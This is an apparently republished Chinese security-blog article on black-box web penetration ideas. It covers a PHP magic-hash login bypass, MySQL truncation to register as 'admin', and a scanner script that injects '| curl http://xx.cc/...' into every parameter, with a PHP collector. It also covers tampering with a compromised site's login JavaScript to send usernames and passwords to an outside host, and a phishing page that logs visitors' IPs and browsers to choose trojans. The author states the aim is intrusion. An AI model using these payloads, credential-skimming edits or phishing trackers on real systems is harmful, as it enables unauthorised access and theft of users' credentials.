Web黑盒渗透思路之猜想 – 作者:心东-安全小百科

*本文原创作者：心东，本文属FreeBuf原创奖励计划，未经许可禁止转载

场景：WEB后台爆破

后台爆破很多人都会选择最经典的模式，如字典爆破，挖掘未授权访问漏洞，挖掘验证码漏洞（未刷新，验证码识别）等方法。

猜想：

1、后台程序是采用MD5加密的方式，并且验证密码跟被验证密码都是从PHP的MD5加密处理的（PHP5~7存在此BUG），例如：

原理：

程序在处理哈希字符串时，会利用”不等于或等于来对哈希值进行比较，它把每一个以 0E 开头的哈希值都解释为0，所以如果两个不同的密码经过哈希以后，其哈希值都是以0E开头的，那么PHP就会认为他们相等。那么在爆破的时候字典加入一个MD5加密之后以0e开头的明文密码即可。

2、前台有注册，是否跟后台用的是同一个SESSION文件，例如：

这个SESSION 我们可以假设。程序员在开发中注册一个会员那么就会添加一条数据到数据库里。登录验证成功后会写入一个session，那么后台验证中判断session他可能是这样写的。

  if($_SESSION['user']){
        return True;    
}

这个设计缺陷可以假设他的session跟前台用户的session用的是同一个。从而导致一个未授权访问。（前台登录之后访问后台）当然也可以说成是越权。因为我们从一个注册会员登录写入了session 从而导致有访问后台的权限 PS：具体情况得看代码怎么写。

以上方法我们可以幻想很多很多种漏洞。列如这个

我们又可以这样猜想：system的键名是用来判断权限。1则为管理员 0则为普通用户在前台有个注册功能，那么我们又联想到了一个MYSQL的一个溢出漏洞my.ini。

sql-mode=”NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION”

比如一个表的结构是这样的：

create table admin(
username varchar(10) not null,
passwd varchar(10) not null);

可以看到username跟passwd的字节为10，但是my.ini设置成

sql-mode=”NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION”

的话，就算超出也会添加成功，比如：

insert into admin values(‘1234567891         2’,'123456');

他不会插入“1234567891 2 ”而是插 ”1234567891“ 因为指针到1的时候字节就等于10了。因此我们注册会员的时候，admin、空格、空格、空格、空格、空格、XX，然后这样就会注册到了admin。

切回话题，我们又可以很离谱的这样猜想。前台注册用户用的数据库跟后台是同一个数据表字段。那么我们可以从前台注册然后登录后台。（这种我还是碰到过的）

当然思路还是有很多很多的，得看你去怎么去猜想他的代码了

场景：WEB扫描器忽略的功能

扫描器相信大家都是用过的，比如一些知名的扫描器：BURP、AppScan 等，但是扫描器也有不够人性化的时候，例如爬虫扫描。

这样我们就以扫描为主题：

1、表单破解，有验证码

2、扫描values型SQL注入

3、存储XSS误报多

4、被隐藏的某种存在高危漏洞的功能（列如存在命令执行没有任何响应的情况下扫描器判断不出来）

在这里公布一个自写AWVS的扫描规则库(扫描命令执行无响应)：

文件名：cmd.script

解释：扫描过程中每个参数都会添加

例如： | curl http://xx.cc/ 然后发送请求 i_url 变量是当前扫描的YRL

var targetUrl = new TURL(scanURL.url);
// 获取当前的方案 也就是获取爬虫到的当前请求
var scheme = getCurrentScheme();
// 创建一个HTTP的工作（要求）
var http = new THTTPJob();
// 在新创建的作业中填充计划 将当前请求添加到HTTP
scheme.populateRequest(http);
http_top = http.request; //获取HTTP请求头
//http_top.msg2 获取文件+参数
hmsg2 = http_top.msg2.replace(/&/g, "-")
i_url = scanURL.hostPort+"/"+hmsg2;
// 一个方案可以有多个输入
for (var i=0;i<scheme.inputCount; i++)
{
    // 每个输入可以有多个变化
    var variations = scheme.selectVariationsForInput(i);
    for (var j=0; j < variations.count; j++)
    {
            // 负荷的变化
            scheme.loadVariation(variations.item(j));
            // 设置我们的有效载荷的输入值 <XSS>
            scheme.setInputValue(i, unescape('curl http://xx.cc/xd.php?i='+i_url));
            // 创建一个HTTP的工作（要求）
            var job = new THTTPJob();
            // 设置工作targeturl URL
            job.url = targetUrl;
            // 在新创建的作业中填充计划
            scheme.populateRequest(job);
            // 执行HTTP工作
            job.execute();
    }
}
// 一个方案可以有多个输入
for (var i=0;i<scheme.inputCount; i++)
{
    // 每个输入可以有多个变化
    var variations = scheme.selectVariationsForInput(i);
    for (var j=0; j < variations.count; j++)
    {
            // 负荷的变化
            scheme.loadVariation(variations.item(j));
            // 设置我们的有效载荷的输入值 <XSS>
            scheme.setInputValue(i, unescape('| curl http://xx.cc/xd.php?i='+i_url));
            // 创建一个HTTP的工作（要求）
            var job = new THTTPJob();
            // 设置工作targeturl URL
            job.url = targetUrl;
            // 在新创建的作业中填充计划
            scheme.populateRequest(job);
            // 执行HTTP工作
            job.execute();
    }
}
// 一个方案可以有多个输入
for (var i=0;i<scheme.inputCount; i++)
{
    // 每个输入可以有多个变化
    var variations = scheme.selectVariationsForInput(i);
    for (var j=0; j < variations.count; j++)
    {
            // 负荷的变化
            scheme.loadVariation(variations.item(j));
            // 设置我们的有效载荷的输入值 <XSS>
            scheme.setInputValue(i, unescape('| curl http://xx.cc/xd.php?i='+i_url+"%23"));
            // 创建一个HTTP的工作（要求）
            var job = new THTTPJob();
            // 设置工作targeturl URL
            job.url = targetUrl;
            // 在新创建的作业中填充计划
            scheme.populateRequest(job);
            // 执行HTTP工作
            job.execute();
    }
}
// 一个方案可以有多个输入
for (var i=0;i<scheme.inputCount; i++)
{
    // 每个输入可以有多个变化
    var variations = scheme.selectVariationsForInput(i);
    for (var j=0; j < variations.count; j++)
    {
            // 负荷的变化
            scheme.loadVariation(variations.item(j));
            // 设置我们的有效载荷的输入值 <XSS>
            scheme.setInputValue(i, unescape(' | curl http://xx.cc/xd.php?i='+i_url+")%23"));
            // 创建一个HTTP的工作（要求）
            var job = new THTTPJob();
            // 设置工作targeturl URL
            job.url = targetUrl;
            // 在新创建的作业中填充计划
            scheme.populateRequest(job);
            // 执行HTTP工作
            job.execute();
    }
}
// 一个方案可以有多个输入
for (var i=0;i<scheme.inputCount; i++)
{
    // 每个输入可以有多个变化
    var variations = scheme.selectVariationsForInput(i);
    for (var j=0; j < variations.count; j++)
    {
            // 负荷的变化
            scheme.loadVariation(variations.item(j));
            // 设置我们的有效载荷的输入值 <XSS>
            scheme.setInputValue(i, unescape(' | curl http://xx.cc/xd.php?i='+i_url+"))%23"));
            // 创建一个HTTP的工作（要求）
            var job = new THTTPJob();
            // 设置工作targeturl URL
            job.url = targetUrl;
            // 在新创建的作业中填充计划
            scheme.populateRequest(job);
            // 执行HTTP工作
            job.execute();
    }
}
接受请求的PHP代码：
文件名：xd.php
<?php   
$ip = $_SERVER["REMOTE_ADDR"]? $_SERVER["REMOTE_ADDR"] : "";
if($ip){
$i = empty($_GET['i'])? "" : $_GET['i'];
$txt = htmlspecialchars($ip."-----".$i."\r\n");
$na = fopen("xd.txt", "a+");
$xie = fwrite($na, $txt);
}
?>  
文件名： cmd_inspect.script
解释：扫描器扫完后 发送一个HTTP请求 判断是否这个域名是否存在命令执行漏洞
// scanurl.url返回URL字符串
var targetUrl = new TURL("http://xx.cc/xd.txt");
var http = new THTTPJob();
http.url = targetUrl;
http.verb = 'GET';
// 执行请求
http.execute();
var dzRes = http.response.body; //获取HTTP响应内容
if(dzRes.indexOf(scanURL.hostPort) != -1){
    
        logInfo('message:----> yuanchengminglingzhixing!!');//扫描日志输出信息
    var ri = new TReportItem();//新建报告结果 返回扫描器界面
    ri.LoadFromFile("cmd.xml"); //载入模板
    ri.affects = "http://xx.cc/xd.txt";
    ri.request = http.request.toString(); //将HTTP请求头输出到扫描器
    ri.response = http.response.body; //将HTTP响应的内容输出到扫描器
    ri.fullResponse = http.response.body; //将HTTP响应的内容输出到扫描器
    // 添加警报
    AddReportItem(ri);//确定输出
}

回归话题，我们猜想到许许多多扫描器忽视的功能

例如：爬虫爬不到的地方，values型SQL注入，存在XSS，当然不是高危漏洞我们就不必挖掘，因为我们目的是以入侵为主，像某些逻辑漏洞我们可以无视。

场景：拿到webshell 数据密码加密的情况下获得明文密码

我们拿到webshell之后想拿到数据库的明文密码，我们一开始的思维肯定在想：逆推，撞库，还有就是嗅探等方法。

嗅探方法：流量大，易被防火墙报警。

逆推方法：耗脑。

撞库方法：走很多个步骤。（收集数据）

其实我们可以换个角度去想的，居然我们都拿到webshell了，还不如修改 WEB程序，例如验证用户密码是否对错，如果登录成功，那么就记录他的。

例如这个。

那么问题来了，没权限修改怎么办？你可能会想到提权。。。

其实我们把目光指向到HTML。。。列如

我们可以看到有后台登录页面有包含JS的地方，那么我们可以去修改JS，利用ajax方法来获取html 的input的值来发送到我们服务器上，但是也可以不用ajax方法。

你也可以用这种方法。

比如：比如点击提交按钮被触发后我们可以获取input的值然后 <img src=”http://xx.cc/1.php?user=xxx&pass=xxx” />

当然如果JS文件还没权限修改的话你可以提权。。又或者你有跟他同一个局域网的机器，进行中间人劫持。如果他是HTTPS的话你可以往里面注入个JS。

场景：收集信息无从下手

收集信息我个人觉得这个要个人的实战经验，以及思考能力。我个人的实战经验虽不算多，不过在这里我还是说下某些信息被我们忽视掉的信息。

第一种：

列如某站：www.aa.com (未做CDN)

很多人都会走以下流程:收集子域，注册人信息以及注册过的域名关联域名等等。

同时也有人忽视掉了一点，那就是域名解析历史IP，我们可以这样猜想域名没换，但是服务器搬了很多次。

当前某域名解析的IP是69.。那么我们可以大胆的假设，103开头的IP是以前的服务器，域名现在解析换成了69开头的，但是103开头的服务器网站服务还是开的，数据也没清理。。。我们把网站解析到103开头的IP，这也是一种收集信息的技巧。。。

第二种：

查找跟目标同一个内网关联的域名，（C段根据网站内容判断是否跟目标同一个内网，子域，或者有着关联的部门，又或者有着直接关联的，再或者从百科了解信息查找可疑跟目标同一个内网的站。。还有很多种方法）

场景：渗透攻击之钓鱼

相信鱼叉攻击法大家都是用过的，如果只是针对一个单用户钓鱼的话我们可以利用某种辅助功能来收集信息为我们入侵铺上更好的环境。

比如：一个MVC思想的站中。收集信息（找目标源码什么都没有包括邮箱信息），以及任何任何任何的入侵方式都无效并且我们感到无能为力的情况下。但是有个提交留言板（毫无漏洞）。

我们可以这样想。插入一个URL，比如：http://www.a.com/1.php

1、php 代码如下：

<?php
header("Content-type: text/html; charset=gb2312");
include './1.html';
$http = $_SERVER['HTTP_USER_AGENT']? $_SERVER['HTTP_USER_AGENT'] : "";
$ip = $_SERVER["REMOTE_ADDR"]? $_SERVER["REMOTE_ADDR"] : "";
$txt = htmlspecialchars($ip."-----".$http."\r\n");
$na = fopen("xd2.txt", "a+");
$xie = fwrite($na, $txt);
?>

2、HTML 是钓鱼内容

代码中记录到了浏览器头，我们从浏览器头可以判断目标是用了windows系统还是linux系统，列如MAC 系统我们可以准备MAC 木马。。

我们又记录到了他的IP。我们又可以去想象记录中的 IP是可以代理IP，公网，我们可以从他的代理IP下手，又或者C段进行中间人攻击。。。